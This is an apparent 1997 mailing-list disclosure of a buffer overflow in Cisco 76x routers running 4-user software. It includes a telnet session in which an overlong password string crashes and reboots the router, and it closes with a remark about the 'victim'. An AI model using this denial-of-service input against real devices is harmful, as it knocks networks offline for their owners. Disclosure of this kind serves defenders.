cisco 76x buffer overflow

Laslo Orto (Laslo@CPOL.COM)
Thu, 11 Dec 1997 01:11:13 -0500

I dont know of anybody ever posting anything on this sbuject, so i'll go
ahed. I found a buffer overflow in the cisco 76x
series router. The bug exists only in the 4 users limit software, i couldnt
reproduce it with the unlimited version.
When i reported the bug to cisco i promised them that i'll post this info to
public if they dont fix it withing a week.
It was over a month ago, and i was never notified of any fix so i'm asuming
they didnt make any fix. I also cant find any
mentioning of this bug on their web site by searching for the bug id.
The exploit is prety simple:
telnet cisco762.domain.com
Trying 1.2.3.4...
Connected to 1.2.3.4.
Escape character is '^]'.
Enter Password:Enter a
veryyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy
yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy
yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy
yyyyyyyyyyyyyyyyyyyyyyyyyyyy long string here
and watch the prety lights go on as the cisco reboots, or imagine your
victim tearing his hair out.